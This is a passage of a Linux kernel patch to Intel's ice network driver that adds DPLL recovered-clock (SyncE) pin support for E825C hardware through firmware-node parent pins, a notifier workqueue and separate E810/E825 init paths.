dpll_pin *pin, void *pin_priv, enum dpll_pin_state state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; bool enable = state == DPLL_PIN_STATE_CONNECTED; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; + struct ice_hw *hw; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; + + hw = &pf->hw; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; if ((enable && p->state[hw_idx] == DPLL_PIN_STATE_CONNECTED) || (!enable && p->state[hw_idx] == DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? + ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered */ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - * Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, &ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + + return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from device tree + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * @count: number of pins to initialize + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with a dplls + * @pf: board private structure + * @cgu: if cgu is present and controlled by this NIC + * + * Initialize directly connected pf's pins within pf's dplls in a Linux dpll + * subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_DPLL_FLAG not set). + */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops. * * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). + * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. */ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct ice_pf *pf) mutex_destroy(&d->lock); dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if (pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case 